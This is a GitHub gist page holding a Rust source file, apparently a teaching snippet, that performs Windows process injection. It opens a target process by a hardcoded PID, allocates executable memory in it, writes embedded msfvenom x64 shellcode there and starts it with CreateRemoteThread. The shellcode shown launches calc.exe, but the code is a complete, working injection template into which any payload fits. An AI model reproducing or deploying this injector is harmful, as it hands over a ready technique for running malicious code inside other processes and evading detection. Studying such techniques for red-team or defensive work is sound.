Skip to content

Instantly share code, notes, and snippets.

@OtterHacker

OtterHacker/RustProcessInjection101.rs

Created May 27, 2023 16:35
Show Gist options
  • Save OtterHacker/17141ff0a3f576090a81da5995ff47e0 to your computer and use it in GitHub Desktop.
Save OtterHacker/17141ff0a3f576090a81da5995ff47e0 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
RustProcessInjection101.rs
/*
* Rust basic Process injection using OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread
*/
#[allow(non_camel_case_types)]
type HANDLE = *mut u64;
#[allow(non_camel_case_types)]
type LPVOID = *mut u64;
#[allow(non_camel_case_types)]
type DWORD = u32;
#[allow(non_camel_case_types)]
type SIZE_T = u64;
#[allow(non_camel_case_types)]
type BOOL = DWORD;
#[allow(non_camel_case_types)]
type LPCVOID = *const u8;
#[link(name = "KERNEL32")]
extern {
fn OpenProcess( dwDesiredAccess: DWORD, bInheritHandle: DWORD, dwProcessId: DWORD) -> HANDLE;
fn VirtualAllocEx(hProcess: HANDLE, lpAddress: LPVOID, dwSize: SIZE_T, flAllocationType: DWORD, flProtect: DWORD) -> LPVOID;
fn WriteProcessMemory(hProcess: HANDLE, lpBaseAddress: LPVOID, lpBuffer: LPCVOID, nSize: SIZE_T, lpNumberOfBytesWritten: *mut SIZE_T) -> BOOL;
fn CreateRemoteThread(hProcess: HANDLE, lpThreadAttributes: LPVOID, dwStackSize: SIZE_T, lpStartAddress: LPVOID, lpParameter: LPVOID, dwCreationFlags: DWORD, lpThreadId: *mut DWORD) -> HANDLE;
}
fn main() {
// MSFVENOM calc shellcode x64
let shellcode: [u8;276] =
[0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
0x63,0x2e,0x65,0x78,0x65,0x00];
let process_all_access: u32 = 0x1fffff;
let pid: u32 = 23376;
let process_handle: HANDLE = unsafe{OpenProcess(process_all_access, 0, pid)};
assert!(!process_handle.is_null());
println!("[+] Opening process {}", pid);
let remote_buffer: HANDLE = unsafe{VirtualAllocEx(process_handle, std::ptr::null_mut(), shellcode.len() as u64, 0x00001000 | 0x00002000, 0x40)};
assert!(!remote_buffer.is_null());
println!("[+] Buffer allocated at : {:?}", process_handle);
let mut bytes_written: SIZE_T = 0;
let status: BOOL = unsafe{WriteProcessMemory(process_handle, remote_buffer, shellcode.as_ptr(), shellcode.len() as u64, &mut bytes_written)};
assert!(status != 0);
println!("[+] {} bytes written at {:?}", bytes_written, remote_buffer);
let mut _thread_id: DWORD = 0;
let thread_handle: HANDLE = unsafe{CreateRemoteThread(process_handle, std::ptr::null_mut(), 0, remote_buffer, std::ptr::null_mut(), 0, &mut _thread_id)};
assert!(!thread_handle.is_null());
println!("[+] Shellcode injected !");
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment